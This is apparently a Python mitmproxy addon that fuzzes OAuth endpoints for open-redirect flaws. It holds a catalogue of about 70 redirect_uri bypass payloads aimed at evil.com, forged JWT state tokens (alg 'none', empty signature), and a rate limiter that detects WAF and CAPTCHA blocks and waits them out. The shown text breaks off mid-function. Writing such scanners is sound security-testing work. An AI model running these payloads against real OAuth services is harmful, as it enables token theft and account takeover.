oauth-backend/addon/open_redirect_check.py
2025-07-18 13:35:43 +09:00

1724 lines
71 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

from mitmproxy import http
import aiohttp
import asyncio
import random
import time
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse, unquote
from lib.report_vuln import report_vuln
GLOBAL_REDIRECT_TRACKING = {
'tracked_redirect_uris': set(),
'last_cleanup': time.time()
}
class RedirectRateLimiter:
"""OAuth Open Redirect 체크 전용 rate limiter"""
def __init__(self):
self.last_request = 0
self.request_count = 0
self.failure_count = 0
self.consecutive_failures = 0
self.blocked_until = 0
self.pattern_index = 0 # 현재 테스트 중인 패턴 번호
self.should_abandon_target = False
# 설정값 (전체 패턴 기준으로 최적화)
self.base_delay = 2.0 # 기본 2초 지연
self.failure_backoff = 0.5 # 실패시 0.5초씩 증가
self.max_delay = 5.0 # 최대 5초 지연
self.block_duration = 300 # 5분 차단
self.success_speedup = 0.8 # 성공시 속도 증가
def reset_for_new_target(self):
"""새로운 타겟을 위해 상태 리셋"""
self.last_request = 0
self.request_count = 0
self.failure_count = 0
self.consecutive_failures = 0
self.blocked_until = 0
self.pattern_index = 0
self.should_abandon_target = False
print("[RATE_LIMIT] 새로운 타겟을 위해 Rate Limiter 리셋됨")
async def wait_if_needed(self, pattern_name: str, target_url: str = "") -> bool:
"""속도 조절 및 차단 대기"""
current_time = time.time()
if self.should_abandon_target:
print(f"[TARGET_ABANDON] ⏹️ 타겟 포기됨 - 테스트 중단")
return False
# 차단 중인지 확인
if current_time < self.blocked_until:
remaining = int(self.blocked_until - current_time)
# 카운트다운 (10초 단위)
for i in range(remaining, 0, -1):
if i % 10 == 0 or i <= 10:
minutes = i // 60
seconds = i % 60
time_str = f"{minutes}{seconds}" if minutes > 0 else f"{seconds}"
print(f"\r⏳ 퍼징 재개까지: {time_str} 남음", end="", flush=True)
await asyncio.sleep(1)
print(f"\n✅ 대기 완료! {pattern_name} 패턴 퍼징 재개...")
self.blocked_until = 0
# 일반적인 퍼징 속도 조절
delay = self._calculate_delay()
time_since_last = current_time - self.last_request
if time_since_last < delay:
wait_time = delay - time_since_last
if wait_time > 2:
print(f"[FUZZER] ⏳ {wait_time:.1f}초 대기 (패턴: {pattern_name})")
await asyncio.sleep(wait_time)
self.last_request = time.time()
self.request_count += 1
self.pattern_index += 1
if self.pattern_index % 5 == 0:
print(f"[PROGRESS] 📊 {self.pattern_index}/71 패턴 테스트 완료 ({(self.pattern_index/71)*100:.1f}%)")
return True
def _calculate_delay(self) -> float:
"""적응형 지연 시간 계산"""
delay = self.base_delay
# 연속 실패에 따른 백오프
if self.consecutive_failures > 0:
backoff = min(self.consecutive_failures * self.failure_backoff, 3.0)
delay += backoff
# 전체 실패율에 따른 조정
if self.request_count > 5:
failure_rate = self.failure_count / self.request_count
if failure_rate > 0.3: # 실패율 30% 초과시
delay *= (1 + failure_rate)
# 최대값 제한
delay = min(delay, self.max_delay)
# 랜덤 지터 (±20%)
jitter = random.uniform(0.8, 1.2)
return delay * jitter
def record_success(self):
"""성공 기록"""
self.consecutive_failures = 0
# 성공시 약간 속도 증가 (학습 효과)
if self.base_delay > 0.5:
self.base_delay *= self.success_speedup
def record_failure(self, error_msg: str = ""):
"""실패 기록 및 차단 감지"""
self.failure_count += 1
self.consecutive_failures += 1
# 연속 5회 실패시 타겟 포기
if self.consecutive_failures >= 5:
self.should_abandon_target = True # ← 포기 플래그 설정
print(f"[TARGET_ABANDON] 🚫 연속 실패 {self.consecutive_failures}회 - 타겟 포기")
return
# 웹사이트 방어 메커니즘 감지 패턴들
rate_limit_patterns = [
'429', # Too Many Requests
'rate limit', 'rate-limit', 'ratelimit',
'too many requests', 'request limit',
'throttled', 'throttling'
]
# 웹방화벽/보안 솔루션 차단 패턴들
security_block_patterns = [
'cloudflare', 'security check',
'access denied', 'forbidden',
'blocked', 'banned', 'suspended',
'captcha', 'recaptcha',
'bot detected', 'suspicious activity'
]
error_lower = str(error_msg).lower()
if any(pattern in error_lower for pattern in rate_limit_patterns):
self.blocked_until = time.time() + self.block_duration
print(f"[RATE_LIMIT] 🚫 웹사이트 Rate Limit 감지 - {self.block_duration}초 대기 예정")
return
elif any(pattern in error_lower for pattern in security_block_patterns):
self.blocked_until = time.time() + self.block_duration
print(f"[SECURITY_BLOCK] 🛡️ 웹방화벽/보안 솔루션 차단 - {self.block_duration}초 대기 예정")
return
if self.consecutive_failures >= 5:
short_wait = 120
self.blocked_until = time.time() + short_wait
print(f"[FUZZER_PAUSE] ⏸️ 연속 실패 {self.consecutive_failures}회 - {short_wait}초 대기")
# 글로벌 레이트 리미터
redirect_limiter = RedirectRateLimiter()
class BypassPayload:
""" 우회 패턴 정의 """
def __init__(self, name: str, mutate_func, description: str):
self.name = name
self.mutate = mutate_func #우회 url 만드는 함수
self.description = description
class OpenRedirectChecker:
def __init__(self):
self.testing_targets = set() # 현재 테스트 중인 타겟들
self.tested_endpoints = set() # 이미 테스트 완료된 엔드포인트들
self.session = None
self._initialize_bypass_payloads() # bypass_payloads를 __init__에서 초기화
""" 우회 페이로드 목록 """
def _initialize_bypass_payloads(self):
self.bypass_payloads = [
BypassPayload(
name=r"@",
mutate_func=self._mutate_pattern1,
description=r"Host bypass attack using @ symbol: evil.com@target.com"
),
BypassPayload(
name="jwt_none_algorithm",
mutate_func=self._mutate_pattern47,
description="JWT state parameter 'none' algorithm bypass"
),
BypassPayload(
name="state_parameter_pollution",
mutate_func=self._mutate_pattern49,
description="Multiple state parameters pollution attack"
),
BypassPayload(
name=r"backslash_bypass",
mutate_func=self._mutate_pattern9,
description=r"Backslash URL parsing bypass: target.com\\evil.com"
),
BypassPayload(
name=r"double_slash",
mutate_func=self._mutate_pattern10,
description=r"Double slash bypass: target.com//evil.com"
),
BypassPayload(
name=r"wildcard_subdomain_bypass",
mutate_func=self._mutate_pattern8,
description=r"Wildcard subdomain bypass: attacker.target.com"
),
BypassPayload(
name=r"question_mark",
mutate_func=self._mutate_pattern11,
description=r"Question mark bypass: target.com?evil.com"
),
BypassPayload(
name=r"%ff@",
mutate_func=self._mutate_pattern2,
description=r"Hostname parsing bypass using Unicode %ff byte: evil%ff@target.com"
),
BypassPayload(
name=r"%ff_subdomain",
mutate_func=self._mutate_pattern3,
description=r"Unicode %ff byte injection in subdomain: evil%ff.target.com"
),
BypassPayload(
name=r"fullwidth_slash_direct",
mutate_func=self._mutate_pattern4_1,
description=r"Direct fullwidth slash bypass: target.com@evil.com"
),
BypassPayload(
name=r"fullwidth_slash_encoded",
mutate_func=self._mutate_pattern4_2,
description=r"Encoded fullwidth slash bypass: target.com%EF%BC%8F@evil.com"
),
BypassPayload(
name=r"fullwidth_backslash_direct",
mutate_func=self._mutate_pattern4_3,
description=r"Direct fullwidth backslash bypass: target.com@evil.com"
),
BypassPayload(
name=r"fullwidth_backslash_encoded",
mutate_func=self._mutate_pattern4_4,
description=r"Encoded fullwidth backslash bypass: target.com%EF%BC%BC@evil.com"
),
BypassPayload(
name=r"mixed_backslash_types",
mutate_func=self._mutate_pattern5,
description=r"Mixed backslash types: target.com\\evil.com"
),
BypassPayload(
name=r"mixed_backslash_fullwidth_slash",
mutate_func=self._mutate_pattern6,
description=r"Mixed backslash and fullwidth slash: target.com\\evil.com"
),
BypassPayload(
name=r"path_traversal_basic",
mutate_func=self._mutate_pattern7_1,
description=r"Basic path traversal: target.com/path/../../../evil.com"
),
BypassPayload(
name=r"path_traversal_deep",
mutate_func=self._mutate_pattern7_2,
description=r"Deep path traversal: target.com/path/../../../../../../../../evil.com"
),
BypassPayload(
name=r"path_traversal_absolute",
mutate_func=self._mutate_pattern7_3,
description=r"Absolute path traversal: target.com/../evil.com"
),
BypassPayload(
name=r"path_traversal_mixed",
mutate_func=self._mutate_pattern7_4,
description=r"Mixed slash traversal: target.com/path/.././.././evil.com"
),
BypassPayload(
name=r"path_traversal_semicolon",
mutate_func=self._mutate_pattern7_5,
description=r"Semicolon path traversal: target.com/path/..;/..;/evil.com"
),
BypassPayload(
name=r"path_traversal_encoded",
mutate_func=self._mutate_pattern7_6,
description=r"URL encoded traversal: target.com/path/%2e%2e/%2e%2e/evil.com"
),
BypassPayload(
name=r"path_traversal_double_encoded",
mutate_func=self._mutate_pattern7_7,
description=r"Double encoded traversal: target.com/path/%252e%252e%252f/evil.com"
),
BypassPayload(
name=r"path_traversal_hex",
mutate_func=self._mutate_pattern7_8,
description=r"Hex encoded traversal: target.com/path/%2e%2e%2f%2e%2e%2f/evil.com"
),
BypassPayload(
name=r"path_traversal_unicode",
mutate_func=self._mutate_pattern7_9,
description=r"Unicode dot traversal: target.com/path///evil.com"
),
BypassPayload(
name=r"path_traversal_backslash",
mutate_func=self._mutate_pattern7_10,
description=r"Backslash traversal: target.com/path\\..\\..\\evil.com"
),
BypassPayload(
name=r"path_traversal_overlong",
mutate_func=self._mutate_pattern7_11,
description=r"Overlong UTF-8 traversal: target.com/path/%c0%ae%c0%ae/evil.com"
),
BypassPayload(
name=r"path_traversal_null",
mutate_func=self._mutate_pattern7_12,
description=r"Null byte traversal: target.com/path/../%00../evil.com"
),
BypassPayload(
name=r"idn_homograph",
mutate_func=self._mutate_pattern12,
description=r"IDN homograph attack using visually similar characters: gооgle.com (Cyrillic)"
),
BypassPayload(
name=r"ipv6_bypass",
mutate_func=self._mutate_pattern13,
description=r"IPv6 address bypass: evil.com@[::1] or evil.com@[2001:db8::1]"
),
BypassPayload(
name=r"mixed_case_idn_combo",
mutate_func=self._mutate_pattern14,
description=r"Mixed case + IDN combo: ЕVIL.example@TARGET.COM"
),
BypassPayload(
name=r"fragment_bypass",
mutate_func=self._mutate_pattern15,
description=r"Fragment identifier bypass: target.com#@evil.com"
),
BypassPayload(
name=r"combined_bypass",
mutate_func=self._mutate_pattern16,
description=r"Combined multiple bypass techniques: evil.com@target.com//../../evil.com"
),
BypassPayload(
name=r"path_backslash_domain",
mutate_func=self._mutate_pattern17,
description=r"Path backslash domain bypass: target.com\\.evil.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_basic",
mutate_func=self._mutate_pattern18_1,
description=r"Basic mixed encoding: evil.com%09%0A%20@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_full",
mutate_func=self._mutate_pattern18_2,
description=r"Full control char chaos: evil.com%0A%0D%09%0B%0C%20@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_special",
mutate_func=self._mutate_pattern18_3,
description=r"Control + special chars: evil.com%09%0A%20%00%FF@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_double",
mutate_func=self._mutate_pattern18_4,
description=r"Double encoded chaos: evil.com%2509%250A%2520@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_reverse",
mutate_func=self._mutate_pattern18_5,
description=r"Reverse control chars: evil.com%20%0A%09@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_repeat",
mutate_func=self._mutate_pattern18_6,
description=r"Repeated control chars: evil.com%09%09%09@target.com"
),
BypassPayload(
name=r"subdomain_confusion_hyphen",
mutate_func=self._mutate_pattern19,
description=r"Subdomain confusion with hyphen: target-com.evil.com"
),
BypassPayload(
name=r"semicolon_userinfo_bypass",
mutate_func=self._mutate_pattern20,
description=r"Semicolon userinfo bypass: target.com;evil.com"
),
BypassPayload(
name=r"tab_character_bypass",
mutate_func=self._mutate_pattern21,
description=r"Tab character bypass using %09: evil.com%09@target.com"
),
BypassPayload(
name=r"space_character_bypass",
mutate_func=self._mutate_pattern22,
description=r"Space character bypass using %20: evil.com%20@target.com"
),
BypassPayload(
name=r"form_feed_bypass",
mutate_func=self._mutate_pattern23,
description=r"Form feed character bypass using %0c: evil.com%0c@target.com"
),
BypassPayload(
name=r"vertical_tab_bypass",
mutate_func=self._mutate_pattern24,
description=r"Vertical tab bypass using %0b: evil.com%0b@target.com"
),
BypassPayload(
name=r"%0a@",
mutate_func=self._mutate_pattern25,
description=r"Newline character bypass using %0a@: evil.com%0a@target.com"
),
BypassPayload(
name=r"%0d@",
mutate_func=self._mutate_pattern26,
description=r"Carriage return bypass using %0d@: evil.com%0d@target.com (URL parser confusion)"
),
BypassPayload(
name=r"crlf_injection",
mutate_func=self._mutate_pattern27,
description=r"CRLF injection bypass: evil.com%0D%0A@target.com"
),
BypassPayload(
name=r"mixed_case_scheme",
mutate_func=self._mutate_pattern28,
description=r"Mixed case scheme bypass: HtTpS://evil.com@target.com"
),
BypassPayload(
name=r"scheme_dot_injection",
mutate_func=self._mutate_pattern29,
description=r"Scheme dot injection: https.://evil.com@target.com"
),
BypassPayload(
name=r"port_encoded_bypass",
mutate_func=self._mutate_pattern30,
description=r"Port encoded bypass: target.com:%40evil.com (%40 = @)"
),
BypassPayload(
name=r"ampersand_encoded_bypass",
mutate_func=self._mutate_pattern31,
description=r"Ampersand encoded bypass: target.com &%40evil.com"
),
BypassPayload(
name=r"underscore_encoded_bypass",
mutate_func=self._mutate_pattern32,
description=r"Underscore encoded bypass: target.com.%5F.evil.com (%5F = _)"
),
BypassPayload(
name=r"comma_separator_bypass",
mutate_func=self._mutate_pattern33,
description=r"Comma separator bypass: target.com.%2C.evil.com (%2C = ,)"
),
BypassPayload(
name=r"schemeless_bypass",
mutate_func=self._mutate_pattern34,
description=r"Schemeless bypass: //evil.com"
),
BypassPayload(
name=r"schema_colon_bypass",
mutate_func=self._mutate_pattern35,
description=r"Schema colon bypass: http:evil.com"
),
BypassPayload(
name=r"null_byte_prefix",
mutate_func=self._mutate_pattern36,
description=r"Null byte prefix: %00http://evil.com"
),
BypassPayload(
name=r"unicode_spaces_bypass",
mutate_func=self._mutate_pattern37,
description=r"Unicode spaces bypass: evil.com%E2%80%8Btarget.com (zero-width space)"
),
BypassPayload(
name=r"bracket_encoded_bypass",
mutate_func=self._mutate_pattern38,
description=r"Bracket encoded bypass: target.com%5B%40evil.com (%5B = [)"
),
BypassPayload(
name=r"protocol_omit_backslash",
mutate_func=self._mutate_pattern39,
description=r"Protocol omit with backslash: \\\\evil.com\\target.com"
),
BypassPayload(
name=r"query_internal_bypass",
mutate_func=self._mutate_pattern40,
description=r"Internal query bypass: target.com?url=target.com&redirect=evil.com"
),
BypassPayload(
name=r"anchor_at_combo",
mutate_func=self._mutate_pattern41,
description=r"Anchor + @ combo: target.com#evil.com@target.com"
),
BypassPayload(
name=r"emoji_domain_bypass",
mutate_func=self._mutate_pattern42,
description=r"Emoji domain bypass: https://😈.evil.com"
),
BypassPayload(
name=r"punycode_idn_bypass",
mutate_func=self._mutate_pattern43,
description=r"Punycode IDN bypass: https://xn--e1afmkfd.xn--p1ai"
),
BypassPayload(
name=r"backtick_at_combo",
mutate_func=self._mutate_pattern44,
description=r"Backtick @ combo: evil.com`@target.com"
),
BypassPayload(
name=r"complex_encoding_mix",
mutate_func=self._mutate_pattern45,
description=r"Complex encoding mix: evil%2Ecom%09%0A%FF@target.com"
),
BypassPayload(
name=r"question_backslash_combo",
mutate_func=self._mutate_pattern46,
description=r"Question backslash combo: target.com?\\evil.com"
),
BypassPayload(
name="jwt_empty_signature",
mutate_func=self._mutate_pattern48,
description="JWT state parameter empty signature bypass"
),
BypassPayload(
name="state_case_insensitive",
mutate_func=self._mutate_pattern50,
description="State parameter case insensitive bypass: State, STATE, state"
),
BypassPayload(
name="jwt_header_manipulation",
mutate_func=self._mutate_pattern51,
description="JWT header manipulation bypass (typ, alg changes)"
),
BypassPayload(
name="jwt_payload_pollution",
mutate_func=self._mutate_pattern52,
description="JWT payload pollution with malicious claims"
),
]
""" 우회 URL 생성 목록 """
# 1. @
def _mutate_pattern1(self, original: str) -> str:
return f"https://evil.com@{original}"
# 2. %ff@ - 유니코드 바이트 우회
def _mutate_pattern2(self, original: str) -> str:
return f"https://evil%ff@{original}"
# 3. %ff 서브도메인 - 유니코드 바이트 서브도메인 삽입
def _mutate_pattern3(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://evil%ff.{parsed.netloc}{path_part}"
# 4. 전각 문자 패턴 - , %EF%BC%8F, , %EF%BC%BC
# 4_1. 직접 전각 슬래시
def _mutate_pattern4_1(self, original: str) -> str:
return f"https://{original}@evil.com"
# 4_2. URL 인코딩된 전각 슬래시(%EF%BC%8F)
def _mutate_pattern4_2(self, original: str) -> str:
return f"https://{original}%EF%BC%8F@evil.com"
# 4_3. 직접 전각 백슬래시
def _mutate_pattern4_3(self, original: str) -> str:
return f"https://{original}@evil.com"
# 4_4. URL 인코딩된 전각 백슬래시(%EF%BC%BC)
def _mutate_pattern4_4(self, original: str) -> str:
return f"https://{original}%EF%BC%BC@evil.com"
# 5. 백슬래시 + 전각 백슬래시 조합
def _mutate_pattern5(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 6. 백슬래시 + 전각 슬래시
def _mutate_pattern6(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 7. 경로 순회 - Path traversal bypass
# 7-1. 기본 경로 순회
def _mutate_pattern7_1(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/../../../evil.com"
# 7-2. 더 많은 경로 순회
def _mutate_pattern7_2(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/../../../../../../../../evil.com"
# 7-3. 절대 경로로 우회
def _mutate_pattern7_3(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}/../evil.com"
# 7-4. 혼합 슬래시 패턴
def _mutate_pattern7_4(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/.././.././evil.com"
# 7-5. 점 뒤에 추가 문자
def _mutate_pattern7_5(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/..;/..;/evil.com"
# 7-6. URL 인코딩된 경로 순회
def _mutate_pattern7_6(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %2e = ., %2f = /
return f"https://{parsed.netloc}{base_path}/%2e%2e/%2e%2e/%2e%2e/evil.com"
# 7-7. 이중 URL 인코딩
def _mutate_pattern7_7(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %252e = 이중 인코딩된 .
return f"https://{parsed.netloc}{base_path}/%252e%252e%252f%252e%252e%252fevil.com"
# 7-8. 16진수 인코딩
def _mutate_pattern7_8(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# 0x2e2e2f = ../
return f"https://{parsed.netloc}{base_path}/%2e%2e%2f%2e%2e%2f%2e%2e%2fevil.com"
# 7-9. 유니코드 정규화 우회
def _mutate_pattern7_9(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# 유니코드 점 문자들 (U+002E, U+FF0E 등)
return f"https://{parsed.netloc}{base_path}///evil.com"
# 7-10. 백슬래시 + 경로 순회 조합
def _mutate_pattern7_10(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}\\..\\..\\evil.com"
# 7-11. 오버롱 UTF-8 인코딩
def _mutate_pattern7_11(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %c0%ae = 오버롱 UTF-8로 인코딩된 점
return f"https://{parsed.netloc}{base_path}/%c0%ae%c0%ae/%c0%ae%c0%ae/evil.com"
# 7-12. 널 바이트 삽입
def _mutate_pattern7_12(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %00 = 널 바이트
return f"https://{parsed.netloc}{base_path}/../%00../../../evil.com"
# 8. 와일드카드 서브도메인 우회
def _mutate_pattern8(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# 공격자가 제어하는 서브도메인으로 *.target.com 정책 우회
return f"https://attacker.{parsed.netloc}{path_part}"
# 9. 백슬래시 우회 - Dart SDK Issue #50075
def _mutate_pattern9(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 10. 이중 슬래시
def _mutate_pattern10(self, original: str) -> str:
return f"https://{original}//evil.com"
# 11. 물음표 우회
def _mutate_pattern11(self, original: str) -> str:
return f"https://{original}?evil.com"
# 12. IDN 동형문자 공격 - 시각적으로 동일하지만 다른 도메인
def _mutate_pattern12(self, original: str) -> str:
# RFC 2606 테스트 도메인 + IDN 문자 о(키릴 문자 U+043E) vs o(라틴 문자 U+006F) 사용
return f"https://еvil.example@{original}"
# 13. IPv6 주소 우회 - 안전한 버전
def _mutate_pattern13(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# 안전한 IPv6 @ 우회 패턴
if "localhost" in parsed.netloc:
mutated = f"https://evil.example@[::1]:3000{path_part}"
else:
# RFC 3849 문서용 IPv6 주소 사용 (라우팅 안 됨)
mutated = f"https://evil.example@[2001:db8::1]{path_part}"
return mutated
# 14. 대소문자 + IDN 문자 조합으로 필터 우회
def _mutate_pattern14(self, original: str) -> str:
return f"https://ЕVIL.example@{original}" # Е는 키릴 문자
# 15. Fragment identifier 우회
def _mutate_pattern15(self, original: str) -> str:
# Fragment(#)로 실제 목적지 숨기기 - 브라우저는 fragment 부분을 서버에 전송하지 않음
return f"https://{original}#@evil.com"
# 16. 복합 우회 패턴 - 여러 기법 동시 적용
def _mutate_pattern16(self, original: str) -> str:
# @ 우회 + 이중 슬래시 + 경로 순회 조합
return f"https://evil.com@{original}//../../evil.com"
# 17. 경로에 백슬래시 + 도메인 우회 (Chrome, Firefox, Edge)
def _mutate_pattern17(self, original: str) -> str:
# target.com\\.evil.com 패턴 - 기존 백슬래시 패턴과는 다른 위치
return f"https://{original}\\.evil.com"
# 18_1. 혼합 인코딩 우회 (여러 인코딩 방식 조합)
def _mutate_pattern18_1(self, original: str) -> str:
# 탭 + 줄바꿈 + 공백
return f"https://evil.com%09%0A%20@{original}"
# 18_2. 모든 제어 문자 조합
def _mutate_pattern18_2(self, original: str) -> str:
# 줄바꿈 + 캐리지리턴 + 탭 + 수직탭 + 폼피드 + 공백
return f"https://evil.com%0A%0D%09%0B%0C%20@{original}"
# 18_3. 제어 문자 + 특수 문자
def _mutate_pattern18_3(self, original: str) -> str:
return f"https://evil.com%09%0A%20%00%FF@{original}"
# 18_4. 이중 인코딩 + 제어 문자
def _mutate_pattern18_4(self, original: str) -> str:
return f"https://evil.com%2509%250A%2520@{original}"
# 18_5. 역순 제어 문자
def _mutate_pattern18_5(self, original: str) -> str:
return f"https://evil.com%20%0A%09@{original}"
# 18_6. 반복 제어 문자
def _mutate_pattern18_6(self, original: str) -> str:
return f"https://evil.com%09%09%09@{original}"
# 19. 서브도메인 혼동 우회 (하이픈 버전)
def _mutate_pattern19(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# target.com → target-com.evil.com
host_with_hyphen = parsed.netloc.replace('.', '-').replace(':', '-')
return f"https://{host_with_hyphen}.evil.com{path_part}"
# 20. 세미콜론 userinfo 우회
def _mutate_pattern20(self, original: str) -> str:
return f"https://{original};evil.com"
# 21. %09 - 탭 문자 우회
def _mutate_pattern21(self, original: str) -> str:
return f"https://evil.com%09@{original}"
# 22. %20 - 공백 문자 우회
def _mutate_pattern22(self, original: str) -> str:
return f"https://evil.com%20@{original}"
# 23. %0c - 폼 피드 문자 우회
def _mutate_pattern23(self, original: str) -> str:
return f"https://evil.com%0c@{original}"
# 24. %0b - 수직 탭 문자 우회
def _mutate_pattern24(self, original: str) -> str:
return f"https://evil.com%0b@{original}"
# 25. %0a@ - 줄바꿈 문자 우회
def _mutate_pattern25(self, original: str) -> str:
return f"https://evil.com%0a@{original}"
# 26. %0d@ - 캐리지 리턴 우회 (URL parser confusion)
def _mutate_pattern26(self, original: str) -> str:
return f"https://evil.com%0d@{original}"
# 27. CRLF 인젝션 우회
def _mutate_pattern27(self, original: str) -> str:
# %0D%0A = CRLF (Carriage Return + Line Feed) - HTTP 헤더 인젝션
return f"https://evil.com%0D%0A@{original}"
# 28. HTTP/HTTPS 대소문자 혼합 스키마 우회
def _mutate_pattern28(self, original: str) -> str:
return f"HtTpS://evil.com@{original}"
# 29. 점(.) 문자 우회 - 스키마와 호스트 사이에 점 삽입 (표준 위반 = 취약점)
def _mutate_pattern29(self, original: str) -> str:
return f"https.://evil.com@{original}"
# 30. 포트 인코딩 우회 - %40 = @
def _mutate_pattern30(self, original: str) -> str:
return f"https://{original}:%40evil.com"
# 31. 앰퍼샌드 인코딩 우회 - URL 파싱 혼동
def _mutate_pattern31(self, original: str) -> str:
return f"https://{original} &%40evil.com"
# 32. 언더스코어 인코딩 우회 - 도메인 분리자로 오인
def _mutate_pattern32(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://{parsed.netloc}.%5F.evil.com{path_part}"
# 33. 콤마 분리자 우회 - 일부 파서에서 분리자로 인식
def _mutate_pattern33(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://{parsed.netloc}.%2C.evil.com{path_part}"
# 34. 스키마 없는 우회
def _mutate_pattern34(self, original: str) -> str:
return f"//evil.com/{original}"
# 35. 스키마 콜론 우회 - RFC 위반 파싱
def _mutate_pattern35(self, original: str) -> str:
return f"http:evil.com/{original}"
# 36. 널 바이트 prefix - 파싱 혼동
def _mutate_pattern36(self, original: str) -> str:
return f"%00https://evil.com/{original}"
# 37. 유니코드 공백 문자 - %E2%80%8B = zero-width space
def _mutate_pattern37(self, original: str) -> str:
return f"https://evil.com%E2%80%8B@{original}"
# 38. 대괄호 인코딩 우회
def _mutate_pattern38(self, original: str) -> str:
return f"https://{original}%5B%40evil.com"
# 39. 프로토콜 생략 + 백슬래시
def _mutate_pattern39(self, original: str) -> str:
parsed = urlparse(original)
return f"\\\\evil.com\\{parsed.netloc}"
# 40. 쿼리 파라미터 내부 우회
def _mutate_pattern40(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}?url={parsed.netloc}&redirect=evil.com"
# 41. 앵커 태그 + @ 조합
def _mutate_pattern41(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}#evil.com@{parsed.netloc}"
# 42. 이모티콘 도메인
def _mutate_pattern42(self, original: str) -> str:
return f"https://😈.evil.com"
# 43. Punycode IDN 우회 (러시아어 evil.ru)
def _mutate_pattern43(self, original: str) -> str:
return f"https://xn--e1afmkfd.xn--p1ai" # evil в 러시아어
# 44. 백틱 + @ 조합
def _mutate_pattern44(self, original: str) -> str:
return f"https://evil.com`@{original}"
# 45. 복잡한 인코딩 혼합
def _mutate_pattern45(self, original: str) -> str:
return f"https://evil%2Ecom%09%0A%FF@{original}"
# 46. 물음표 + 백슬래시 조합
def _mutate_pattern46(self, original: str) -> str:
return f"https://{original}?\\evil.com"
# 47. JWT 'none' 알고리즘 우회
def _mutate_pattern47(self, original: str) -> str:
import base64
import json
# 'none' 알고리즘으로 서명 없는 JWT 생성
header = {"alg": "none", "typ": "JWT"}
payload = {
"redirect": "https://evil.com",
"iss": "evil.com",
"aud": "client_app",
"exp": 9999999999
}
header_b64 = base64.urlsafe_b64encode(
json.dumps(header, separators=(',', ':')).encode()
).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload, separators=(',', ':')).encode()
).decode().rstrip('=')
# 서명 부분을 빈 문자열로 (none 알고리즘)
malicious_jwt = f"{header_b64}.{payload_b64}."
parsed = urlparse(original)
return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com"
# 48. JWT 빈 서명 우회
def _mutate_pattern48(self, original: str) -> str:
import base64
import json
# 정상적인 헤더이지만 서명은 빈 값
header = {"alg": "HS256", "typ": "JWT"}
payload = {"redirect": "https://evil.com"}
header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
# 서명 부분만 비우기
malicious_jwt = f"{header_b64}.{payload_b64}."
parsed = urlparse(original)
return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com"
# 49. State 파라미터 오염 공격
def _mutate_pattern49(self, original: str) -> str:
parsed = urlparse(original)
query = parse_qs(parsed.query)
# 원본 쿼리 파라미터 유지하면서 state 여러 개 추가
evil_params = []
for key, values in query.items():
for value in values:
evil_params.append(f"{key}={value}")
# 여러 state 파라미터 추가 (파서 혼동 유발)
evil_params.extend([
"state=legitimate_state",
"state=https://evil.com",
"State=https://evil.com", # 대문자
"STATE=https://evil.com", # 모두 대문자
"redirect_uri=https://evil.com"
])
evil_query = "&".join(evil_params)
return f"https://{parsed.netloc}{parsed.path}?{evil_query}"
def _mutate_pattern50(self, original: str) -> str:
"""50. State 파라미터 대소문자 변형"""
parsed = urlparse(original)
base_url = f"https://{parsed.netloc}{parsed.path}"
# 대소문자 조합으로 파서 혼동
return f"{base_url}?state=normal&State=https://evil.com&STATE=backup&redirect_uri=https://evil.com"
# 51. JWT 헤더 조작 우회
def _mutate_pattern51(self, original: str) -> str:
import base64
import json
# 헤더에 이상한 값들 넣어보기
malicious_headers = [
{"alg": "none", "typ": "JWT", "kid": "../../../evil.com"},
{"alg": "HS256", "typ": "JWS"}, # typ 변경
{"alg": "RS256", "typ": "JWT", "x5u": "https://evil.com/cert"}, # 외부 인증서
]
results = []
for header in malicious_headers:
payload = {"redirect": "https://evil.com"}
